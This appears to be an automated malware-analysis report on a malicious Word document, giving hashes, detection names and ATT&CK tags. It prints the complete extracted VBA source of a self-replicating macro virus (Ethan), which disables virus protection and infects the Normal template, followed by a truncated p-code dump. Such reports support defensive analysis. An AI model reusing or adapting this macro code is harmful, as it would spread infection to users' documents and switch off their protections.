Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 94307bb616cd2305…

MALICIOUS

Office (OLE)

29.0 KB Created: 2001-06-05 23:40:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1551d4de4eb3e5b831edac2a12f24ad6 SHA-1: 26b858fd05ca2c88c38579f82b072ae85042b596 SHA-256: 94307bb616cd23053e247518a43ffed11f728eed59c5488a5c0285a59396150a
80 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Ethan-20. It contains VBA macros that, upon execution, attempt to write macro code to 'Normal.dat' and 'License.dat' within the NormalTemplate path. This behavior suggests the macro is designed to persist or facilitate the execution of further malicious code, likely as a downloader.

Heuristics 2

  • ClamAV: Doc.Trojan.Ethan-20 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ethan-20
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8149 bytes
SHA-256: f718e6aad69573767a2a1691cafcaff79db46dad2a370aaff107cd281150c281
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Version = 0.24
' Ďî÷ĺěó ňű íĺ ńęŕçŕë Áĺ-Áĺ ???
    On Error Resume Next
    s = ActiveDocument.Saved
    Application.EnableCancelKey = Not -1
    With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
    Randomize
        Open NormalTemplate.Path & "\Normal.dat" For Output As #1
        Open NormalTemplate.Path & "\License.dat" For Output As #2
        For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
            a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
            Print #1, a
            If i = 2 Then Print #2, a
        Next i
        Close #1
        Close #2
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
        If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1), 7) <> "Version" Then
            Set t = NormalTemplate.VBProject.VBComponents.Item(1)
        End If
    ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
        Set t = ActiveDocument.VBProject.VBComponents.Item(1)
    Else
        t = ""
    End If
    If t <> "" Then
        Open NormalTemplate.Path & "\Normal.dat" For Input As #1
        If LOF(1) = 0 Then GoTo q
        i = 1
        Do While Not EOF(1)
            Line Input #1, a
            t.CodeModule.InsertLines i, a
            i = i + 1
        Loop
q:      Close #1
        If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
        If Rnd < 0.3 Then
            a = MsgBox("You are lamer? Press OK to confirm", vbOKOnly, "Windows NT")
        End If
    End If
    Kill NormalTemplate.Path & "\Normal.dat"
    If Rnd < 0.05 Then
        ActiveDocument.Content.InsertFile NormalTemplate.Path & "\License.dat"
        ActiveDocument.Save
    End If
    If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
    Kill NormalTemplate.Path & "\License.dat"
End Sub

Private Sub Document_New()
    a = MsgBox("Č çŕ÷ĺě ňĺáĺ ýňîň ďóńňîé ôŕéë ???", vbQuestion, "WindowsNT")
End Sub

' Processing file: /opt/analyzer/scan_staging/f6cdce099e65404a888503a231d78320.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4049 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	LitR8 0x1EB8 0xEB85 0xB851 0x3FCE 
' 	St Version 
' Line #2:
' 	QuoteRem 0x0000 0x001E " Ďî÷ĺěó ňű íĺ ńęŕçŕë Áĺ-Áĺ ???"
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	St s 
' Line #5:
' 	LitDI2 0x0001 
' 	UMi 
' 	Not 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #6:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' 	BoS 0x0000 
' 	EndWith 
' Line #7:
' 	ArgsCall Read 0x0000 
' Line #8:
' 	Ld NormalTemplate 
' 	MemLd Path 
' 	LitStr 0x000B "\Normal.dat"
' 	Concat 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #9:
' 	Ld NormalTemplate 
' 	MemLd Path 
' 	LitStr 0x000C "\License.dat"
' 	Concat 
' 	LitDI2 0x0002 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #10:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' Line #11:
' 	Ld i 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 

... (truncated)